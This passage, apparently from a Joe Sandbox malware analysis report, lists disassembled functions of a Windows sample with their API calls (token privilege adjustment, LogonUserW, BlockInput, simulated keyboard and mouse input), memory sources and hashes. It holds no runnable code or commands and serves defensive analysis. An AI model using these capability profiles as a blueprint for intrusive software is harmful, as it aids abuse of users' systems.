                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 33631002-0
                                                                                  • Opcode ID: b6eacc50cd37d94480aeda086c734a80dd30af944beee603171a766ef0c44f13
                                                                                  • Instruction ID: 91d69057d2601b7ba039a62c36bbc11697403fd6a0cdb4989aca7de454c798d3
                                                                                  • Opcode Fuzzy Hash: b6eacc50cd37d94480aeda086c734a80dd30af944beee603171a766ef0c44f13
                                                                                  • Instruction Fuzzy Hash: 0D115E71E01228BFDB108FA4EC45BAEBBBCEB45B50F108156F904E6290D3B05A059BA1
                                                                                  Function 005371FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00537223
                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0053723A
                                                                                  • FreeSid.ADVAPI32(?), ref: 0053724A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                  • String ID:
                                                                                  • API String ID: 3429775523-0
                                                                                  • Opcode ID: 438cc67b8c3296c14fef0fa031aa6a36b516d4939c2ab3cea0525271db06c72c
                                                                                  • Instruction ID: 85d5d3df692c7ecca48bff893c657207855317dc03e83fa2bc1f8aac0c9954e2
                                                                                  • Opcode Fuzzy Hash: 438cc67b8c3296c14fef0fa031aa6a36b516d4939c2ab3cea0525271db06c72c
                                                                                  • Instruction Fuzzy Hash: 46F01275904209FFDF04DFE5DD89EEEBBB9FF08201F105469A506E2191E37156449B10
                                                                                  Function 0053F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0053F599
                                                                                  • FindClose.KERNEL32(00000000), ref: 0053F5C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: b3064c4ca21fc7b7c99cebc25859a74ec45ac7a9b9af8b95be754e80a4350355
                                                                                  • Instruction ID: 16b022768ec9032efa39d11f7650363e986a9e294239d56ed1dbc4bc57e95574
                                                                                  • Opcode Fuzzy Hash: b3064c4ca21fc7b7c99cebc25859a74ec45ac7a9b9af8b95be754e80a4350355
                                                                                  • Instruction Fuzzy Hash: 3411C4716002019FD710EF28D849A2EF7E8FF94324F00891EF8A9D7291CB30AD04CB91
                                                                                  Function 0053CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0054BE6A,?,?,00000000,?), ref: 0053CEA7
                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0054BE6A,?,?,00000000,?), ref: 0053CEB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: f8d11e259c8be434c0af640bf073c4061d6c57cc2e40b19f075bb2e97cfb8296
                                                                                  • Instruction ID: 52457fb8e17f31922763860e6c89089c8b4b0bf7e8f8c38e8fe77ece33966899
                                                                                  • Opcode Fuzzy Hash: f8d11e259c8be434c0af640bf073c4061d6c57cc2e40b19f075bb2e97cfb8296
                                                                                  • Instruction Fuzzy Hash: 31F0823510422DBBDB109BA4DC49FEA7B7DBF08365F004565F919E6181D6709A44DBB0
                                                                                  Function 0053411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00534153
                                                                                  • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00534166
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InputSendkeybd_event
                                                                                  • String ID:
                                                                                  • API String ID: 3536248340-0
                                                                                  • Opcode ID: 3adb1c10a92da85b4d263ff617c84b5bbefcaa0e7da32c2f59945ed8f0586c6f
                                                                                  • Instruction ID: 32fb3506ed5492228e43b87fa11d42d9bae41ae5e02af2642172d0399e8e72ab
                                                                                  • Opcode Fuzzy Hash: 3adb1c10a92da85b4d263ff617c84b5bbefcaa0e7da32c2f59945ed8f0586c6f
                                                                                  • Instruction Fuzzy Hash: 27F0677080028DAFDB058FA0C805BBE7FB0FF10305F00844AF966A6192D7799656EFA0
                                                                                  Function 0052AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0052ACC0), ref: 0052AB99
                                                                                  • CloseHandle.KERNEL32(?,?,0052ACC0), ref: 0052ABAB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: f3341004b1303cce99a0f151a3bd5c44c9c4f7be8a5b19e0f6efc03583a73e47
                                                                                  • Instruction ID: c42e839ca30d8776e5b41db85a60b163b94203b4526de6da80cdd5a80223fdc1
                                                                                  • Opcode Fuzzy Hash: f3341004b1303cce99a0f151a3bd5c44c9c4f7be8a5b19e0f6efc03583a73e47
                                                                                  • Instruction Fuzzy Hash: E9E0BF71000511AFEB252F54FC09D767BB9EF443207108829B85981871D7625D94EB50
                                                                                  Function 005181AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00516DB3,-0000031A,?,?,00000001), ref: 005181B1
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005181BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: f56bc16f8ecb019f855fabcbe9535951e235c622f612ec4787544ec30fd78469
                                                                                  • Instruction ID: 193ddb1aafe70942847cabf4c2ff0be935a913274b7084321c9d0c362c1dc40c
                                                                                  • Opcode Fuzzy Hash: f56bc16f8ecb019f855fabcbe9535951e235c622f612ec4787544ec30fd78469
                                                                                  • Instruction Fuzzy Hash: E5B09231044608ABDB402BA1FC09B587FB8EF18662F004410F60D480618B725494BAB2
                                                                                  Function 0051D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e4295e6514c466c2f5880cc8a298790ec9c09ef9d18f3374b705c6173d79b7b0
                                                                                  • Instruction ID: 47b372476e83783ec5904ac39f56f99ca70900d0708a841a392aaa879f8fd7b1
                                                                                  • Opcode Fuzzy Hash: e4295e6514c466c2f5880cc8a298790ec9c09ef9d18f3374b705c6173d79b7b0
                                                                                  • Instruction Fuzzy Hash: C0321631D29F014DEB239635D822335AA98FFB73D4F15D727E819B59A6EB28C4C35210
                                                                                  Function 004F96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 674341424-0
                                                                                  • Opcode ID: 2848019e96dac854ed8e30fb4f83424dc44b5cbcc24dff477c4446ca6882a529
                                                                                  • Instruction ID: 328f170a6034538fbc4b6817bbb233c262b37b8f8e6604cd62332b8ee2f4b58f
                                                                                  • Opcode Fuzzy Hash: 2848019e96dac854ed8e30fb4f83424dc44b5cbcc24dff477c4446ca6882a529
                                                                                  • Instruction Fuzzy Hash: BA2296716083069BD724DF24C884B6FBBE4BF84304F10491EFA9A9B291DB75ED45CB86
                                                                                  Function 0052038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1b1aab108974e194b30536ea311ff3ed830af4db6f80678d61df8171f2d374a4
                                                                                  • Instruction ID: 9a8678241e918343a18ca6bce717375e9415f10f7234f2deb919954492f9f8a7
                                                                                  • Opcode Fuzzy Hash: 1b1aab108974e194b30536ea311ff3ed830af4db6f80678d61df8171f2d374a4
                                                                                  • Instruction Fuzzy Hash: FAB1F030D2AF518DD22396388835336BB5C6FBB2D5B91E71BFC1A74D62FB2181875280
                                                                                  Function 0053B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __time64.LIBCMT ref: 0053B6DF
                                                                                    • Part of subcall function 0051344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0053BDC3,00000000,?,?,?,?,0053BF70,00000000,?), ref: 00513453
                                                                                    • Part of subcall function 0051344A: __aulldiv.LIBCMT ref: 00513473
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                                  • String ID:
                                                                                  • API String ID: 2893107130-0
                                                                                  • Opcode ID: 410e878339f32b25b790f1ef309d72a25a7984db5149f735b747de3f5c648c46
                                                                                  • Instruction ID: 1a917700c25024365702ebae4f4ad85d43712d242a75d6ccec611ff9a89f3639
                                                                                  • Opcode Fuzzy Hash: 410e878339f32b25b790f1ef309d72a25a7984db5149f735b747de3f5c648c46
                                                                                  • Instruction Fuzzy Hash: 9C2172726345108BD729CF68C491A92BBE1EB95310B248E6DE4E5CB2C1CB74B909DB54
                                                                                  Function 00546AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • BlockInput.USER32(00000001), ref: 00546ACA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockInput
                                                                                  • String ID:
                                                                                  • API String ID: 3456056419-0
                                                                                  • Opcode ID: ab7558b1bff3d97a6d68088ff90b4ce04e51c97556d980fe1d4b7314964a416b
                                                                                  • Instruction ID: 941735c58568dc01e9cae7ebd3dcdd9bde7eaf6d9fa96841943f306970f74a74
                                                                                  • Opcode Fuzzy Hash: ab7558b1bff3d97a6d68088ff90b4ce04e51c97556d980fe1d4b7314964a416b
                                                                                  • Instruction Fuzzy Hash: 1CE01235200204AFD700EB5AD404A9ABBFDBFB5755F048466E949D7291DAB0F8449BA1
                                                                                  Function 005374E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0053750A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: mouse_event
                                                                                  • String ID:
                                                                                  • API String ID: 2434400541-0
                                                                                  • Opcode ID: 37d6921756cd562465cd64aee1799a0d8399c5657232bee36398448d887225ea
                                                                                  • Instruction ID: 03f17ab30f1d4c6f386d34204980d66e8c0e602270f6c299231520eb8d78335e
                                                                                  • Opcode Fuzzy Hash: 37d6921756cd562465cd64aee1799a0d8399c5657232bee36398448d887225ea
                                                                                  • Instruction Fuzzy Hash: C4D06CF596C60D6AEC3907249C1BFB61F58B348781FD48989B616A90C0A8A46D45B031
                                                                                  Function 0052B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0052AD3E), ref: 0052B124
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LogonUser
                                                                                  • String ID:
                                                                                  • API String ID: 1244722697-0
                                                                                  • Opcode ID: 2d0d2442c5d305015e7bc3612e631d41aa1b23d5bde5ef2b84ec8014520b067a
                                                                                  • Instruction ID: 49760e8aa9cccd62b4ba800a578d11421841a68a48d39cc060429f52dc7eb5a7
                                                                                  • Opcode Fuzzy Hash: 2d0d2442c5d305015e7bc3612e631d41aa1b23d5bde5ef2b84ec8014520b067a
                                                                                  • Instruction Fuzzy Hash: 98D05E320A460EAEDF024FA4EC06EAE3F6AEB04700F408110FA15D50A0C672D531AB60
                                                                                  Function 0056B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: 90e1a73d660963a47de537e59c37c2eed115107b6aa5985cf60f48a5988c2d26
                                                                                  • Instruction ID: 5c24804a149bdf555e017179ab894ee18d3e26f40880d7617cba13f3204dfc6e
                                                                                  • Opcode Fuzzy Hash: 90e1a73d660963a47de537e59c37c2eed115107b6aa5985cf60f48a5988c2d26
                                                                                  • Instruction Fuzzy Hash: FDC04CB1400509DFD751CBC0D9489EEB7BCAB04301F105091A106F2110D7709B85AF72
                                                                                  Function 00518189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0051818F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: c763e729a5b4be13f3e3e14518f3af58b05ee74bc4c7f4a7ec3367498868c464
                                                                                  • Instruction ID: 60bfffac5a2a49a8c974534a0de8bfd579af12f7ab6bdd9aeafc4326c62ff7b4
                                                                                  • Opcode Fuzzy Hash: c763e729a5b4be13f3e3e14518f3af58b05ee74bc4c7f4a7ec3367498868c464
                                                                                  • Instruction Fuzzy Hash: 5FA0113000020CAB8F002B82FC088883FBCEA002A0B000020F80C080208B22A8A0AAA2
                                                                                  Function 004F93F0 Relevance: .5, Instructions: 531COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ca8bd0d444fef49babc84a2333fd6951c3959c762bb31790bdb64ea5fa28577
                                                                                  • Instruction ID: 4bce4e5a0261ce4742c0266d3c679cbfbc16737d3eea233cabbb631cb9175d88
                                                                                  • Opcode Fuzzy Hash: 0ca8bd0d444fef49babc84a2333fd6951c3959c762bb31790bdb64ea5fa28577
                                                                                  • Instruction Fuzzy Hash: DB129C70A00609AFDF04DFA5D985ABEB7F5FF48300F20452AE906E7290EB39AD15CB55
                                                                                  Function 004FE3E3 Relevance: .5, Instructions: 521COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
